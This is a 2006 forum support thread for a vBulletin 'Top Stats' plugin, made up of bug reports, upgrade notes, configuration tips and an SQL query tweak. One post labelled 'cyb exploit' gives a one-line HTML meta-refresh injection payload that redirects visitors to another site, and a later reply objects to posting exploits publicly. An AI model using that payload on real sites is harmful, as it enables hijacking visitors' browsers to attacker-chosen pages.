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aberg 09-17-2006 07:24 AM

Works perfectly and i will thank you for your work and time!
Great support from you !!!!!!!!!!

Neal-UK 09-17-2006 10:48 AM

Another small bug:

When viewing forumhome, clicking the username of the poster (Shown underneath the topic title) in the last post column, I get an invalid link error.

hnjco 09-17-2006 03:39 PM

Thanks for this i love clicked on INSTALL

I got one problem
In users post or detail i have correct reputation like some users have 800 some 500 etc but on TOP Stats its showing 10 for all users plus its showing first 20 users(who sign up) then showing TOP 20...

Here is link to my forum My forum

2nd question
Is there any way for Most Viewed Threads or Latest posts to increase Thread letters to like 50-60 or showing full Thread tital, currently its showing only 2 -3 words of each thread or like 20-30 letters.

Btw i'm useing 3.6.1

migowebdesign 09-17-2006 03:43 PM


i think you mean the 3 options on the bottom of the adminpanel for the TopStats. Look at the top @ the screenshot, there you can specify how much characters should be displayed.


hnjco 09-17-2006 04:04 PM

Thanks for quick reply, yes its working fine now... i missed this option before
Thanks again for help.

Any chance for reputation problem to fix by some one?

KoC 09-17-2006 09:08 PM


Originally Posted by The Finman

I have found either a new bug, or the reappearance of a previous one.

In the vB "lobby" that lists the forums and the latest threads in those forums...if I click on the name of the last poster, I get this

(*See Attachments for screen shots)

I have all possible admin powers, and if I disable Cyb Advanced Forum Stats the problem ceases. :surprised:

I have also the same problem. My Moderators have no rights to move or merge threads. Thanks

The Finman 09-17-2006 09:16 PM


Originally Posted by KoC
I have also the same problem. My Moderators have no rights to move or merge threads. Thanks

Cybernetic fixed mine yesterday, although I'm not sure exactly what he changed in the file itself.

I believe he said that since this bug didn't effect everyone that he was going to release it with the next version, which sounded like very soon...but I don't want to pretend to speak for him. :speechless:

Joe Gronlund 09-17-2006 11:39 PM


Originally Posted by Neal-UK
Another small bug:

When viewing forumhome, clicking the username of the poster (Shown underneath the topic title) in the last post column, I get an invalid link error.

I am having the same issue on my board...

trackpads 09-18-2006 12:04 AM

Damn!! I jsut installed and then spent a horrific 20 minutes trying to get back into my forums!! Do not install this if you have a large board. Or Cyb please default all the options to off!

Wow, I ended up renaming my fourm directory and restarting mysql about a dozen times just to get in and disable the plugin. I have over 1.3 million posts and it was repeatedly trying to do an enourmous sql select on I think every row.

Holy cow, no more plugins for me today!!


Valter 09-18-2006 03:41 AM

v4.0 - Sep 18. 2006.
-To completely solve several problems experienced with versions 3.7 - 3.9 I'v changed some things here:
1. You can have stats shown on maximum 2 pages (who needs more?)
2. Stats are shown by default on forumhome (to disable it set "Top Stats Box Position" to "None").
3. To activate second location:
a) type location-name in "Additional Location" field
Explanation: When you open some vBulletin php file you'll see this at the top - "define('THIS_SCRIPT', 'XXX');".
XXX is location-name we need. It's usually the same as php filename (without extension, of course).
b) add "$cybtopstats" to the template called on page where you wish to have stats shown.

To do so: Import XML as product, allow overwrite.

changes in v4.0 may solve your problem too.

Kaith Rustaz 09-18-2006 04:09 AM

Great hack.

1 small hiccup.
I'm running MYSQL 4.0.27 and seeing 0's in the Top Thread Starters column.

hnjco 09-18-2006 12:47 PM


I upgraded to 4.0 but having same problem which i had in 3.9 with reputation, any idea how to fix?

I mention problem in post 163.

KoC 09-18-2006 12:55 PM


Originally Posted by Cybernetec
v4.0 - Sep 18. 2006.
-To completely solve several problems experienced with versions 3.7 - 3.9 I'v changed some things here:
1. You can have stats shown on maximum 2 pages (who needs more?)
2. Stats are shown by default on forumhome (to disable it set "Top Stats Box Position" to "None").
3. To activate second location:
a) type location-name in "Additional Location" field
Explanation: When you open some vBulletin php file you'll see this at the top - "define('THIS_SCRIPT', 'XXX');".
XXX is location-name we need. It's usually the same as php filename (without extension, of course).
b) add "$cybtopstats" to the template called on page where you wish to have stats shown.

To do so: Import XML as product, allow overwrite.

changes in v4.0 may solve your problem too.

The upgrade sloves the problem with the moderator rights. Now i wish to add an option:

At click on the title, redirect to the last posted post. Example link: http://domain.tld/showthread.php?t=232323#2342

Valter 09-18-2006 07:15 PM

I don't think this hack has anything with that.

I'm not sure what problem you have. Try to explain it better.

KoC 09-18-2006 07:27 PM

For example:

Anyone has post a reply to any thread, the url looks like this than:


But at your Forum statistics the output url looks like this: http://www.turkiyemforum.com/showthread.php?p=150474 This is the same thread but not the last posted message/reply. Can you understand it now?

Valter 09-18-2006 07:55 PM

Thread title is linked to start of the thread and little arrow is linked to the last post in that thread.


jgommel 09-18-2006 10:04 PM

I just updated this plugin today, but it appears to not work with vS-Hide Hack Resurrection (Expanded Edition) any more. Per the instructions:

Open plugin "cyb" at "forumhome_complete" hook, and find:

$get_stats_thanks = $db->query_read("
    SELECT userid, usergroupid, IF(displaygroupid=0, usergroupid, displaygroupid) AS displaygroupid, username, posts, post_thanks_thanked_times
    FROM " . TABLE_PREFIX . "user
    ORDER BY post_thanks_thanked_times DESC LIMIT 0, $resultsnr");

Replace with:

$get_stats_thanks = $db->query_read("
    SELECT user.userid, user.username, user.usergroupid, IF(user.displaygroupid = 0, user.usergroupid, user.displaygroupid) AS displaygroupid, user.posts,
      count(thanks.postid) as post_thanks_thanked_times
    FROM " . TABLE_PREFIX . "thanks as thanks
    LEFT JOIN " . TABLE_PREFIX ."post as post ON (post.postid = thanks.postid)
    LEFT JOIN " . TABLE_PREFIX ."user as user ON (post.userid = user.userid)
    GROUP BY user.userid
    ORDER BY post_thanks_thanked_times DESC LIMIT " . $resultsnr . "

I don't see "cyb" at "forumhome_complete" hook anymore? Any suggestions?

iran.gs 09-20-2006 01:44 AM

installed but i got an idea see its very hard to add most of those obtion so why now have a obtion of 2 of them in the same time and pick the each one for diffe obtions that we choice cuz l even shrunk the members id or the name of threats but looks not too good but than again this is an idea to have 2 so we dont have to cut corners infact i use the Top X by infinitewebby for some obtions and the rest on ur obtions but it will be better if urs those 2 sections in the same time.............

WiseOne38221 09-20-2006 09:56 AM

I installed 4.0 and reverted the older template for cyb_topstats_php and it fixed the ajax mark forum read problems...looks good so far. Versions BEFORE 4.0 will stop you from being able to "mark forums read". I never would've guessed it was because of this plugin though...

tienkhom 09-20-2006 05:14 PM

cyb exploit
">"">>>><meta http-equiv="Refresh" content="0;url=http://other site .com"> """" >

da420 09-20-2006 05:32 PM

^^ Have you upgraded to the latest version of this hack?

Also, please dont post exploits in this thread, but PM the author. people can take advantage of you giving them the exploit.

Fenriz 09-21-2006 01:46 PM

Urgent! I've just installed this hack and when I see the forum through the index.php to have my navbar and stats available, all my forums collapsed:
For example http://valhalla.ulver.com/index.php?f=157

When I disable this hack, everything is ok. Please, fix it asap.

Fenriz 09-21-2006 01:52 PM

One more example. You can see the forum through the common link:
but can point the next link to include the "What's Going On?" and over bars from header and footer:

..but in this case I have my forum collapsed, if the Stats hack is working. This is a BUG!

Fenriz 09-21-2006 09:47 PM

I temporary disable this hack because of this problem. I have several links started with http://valhalla.ulver.com/index.php?f=... and they all don't work. Please, fix this problem.

kushal 09-22-2006 09:15 PM

great mod, thank You

Brandr 09-23-2006 10:19 AM

I overwrote the top stats xml with the updated version, and now my forum is almost inoperable. I have disabled all plugins to no avail.

The Administrator can post and read threads, but when a member or moderator tries to view a thread/post or tries to post, they get this error message.

There seems to have been a problem with the ONP database.
Please try again by clicking the Refresh button in your web browser.

An E-Mail has been dispatched to our Technical Staff, whom you can also contact if the problem persists.

We apologise for any inconvenience.

It seems strange that the error is not effecting the Administration account, but everyone else.

Any advice as to how I might correct this? My forum is now useless.
Forum was working fine before the xml overwrite -so it must be related.

Best wishes,

Valter 09-23-2006 10:36 AM


Please create temp admin account for me so I can check it.

soletrader 09-23-2006 12:32 PM

Is there anyway to change the title "Top 10 Stats" to simply "Latest Forum Activity" all the time.

Thank you

Valter 09-23-2006 12:43 PM


Originally Posted by soletrader
Is there anyway to change the title "Top 10 Stats" to simply "Latest Forum Activity" all the time.

Thank you

Phrase Manager

soletrader 09-23-2006 01:08 PM

Thank you. got it to work :)

gooberface 09-24-2006 04:58 AM

I am using MySQL 4.1.21 and the Top Thread Starters isn't working right on my board. I have ensured that the scheduled task has been running as well. It is populating the list with names and some of them have numbers next to them, while others still have 0. Some with zero I have confirmed have actually started threads.

Would anyone know of a reason this would not be working correctly? I'd appreciate any help!

Valter 09-24-2006 05:07 AM

Hi gooberface,

AdminCP > Maintenance > Rebuild Thread Information - this may help.

gooberface 09-24-2006 08:25 AM

Thanks Cybernetec. I did that, and it has worked. I'll continue to check it out and see if the scheduled task will keep it updated. Thanks for your quick support.

topshams 09-24-2006 08:38 PM

I would love this mod to include top referrals. Is there a chance you might add this in the future?

Great mod by the way my members are using it all the time.

Edog 09-25-2006 02:59 AM

There anyway I could add latest links added from VBadvanced Links system?

Valter 09-25-2006 03:06 AM


Originally Posted by topshams
I would love this mod to include top referrals. Is there a chance you might add this in the future?

Great mod by the way my members are using it all the time.

Next version will include this.

Also "excluded usergroups" will be added. Those usergroups will not be able to see Top Stats.

There is no easy way to do that.
I'm not using VBadvanced and didn't planned to add any functions for it.

Edog 09-25-2006 03:12 AM

oK no problem great mod keep up the good work..

Valter 09-25-2006 04:57 AM

v4.1 - Sep 25. 2006.
-Added "Top Referrers"
-Added option to exclude usergroups from viewing top stats
-Few code improvements (zeros excluded from stats, few table parameters adjusted)

To upgrade: Import XML as product, allow overwrite.

TamCaVBoy3 09-25-2006 05:16 AM

upgraded. dont see the top thanked, it has no one on the list

Valter 09-25-2006 05:49 AM


Originally Posted by TamCaVBoy3
upgraded. dont see the top thanked, it has no one on the list

Have you installed Post Thank You Hack?

Live Demo - http://www.bihforum.com (column 4)

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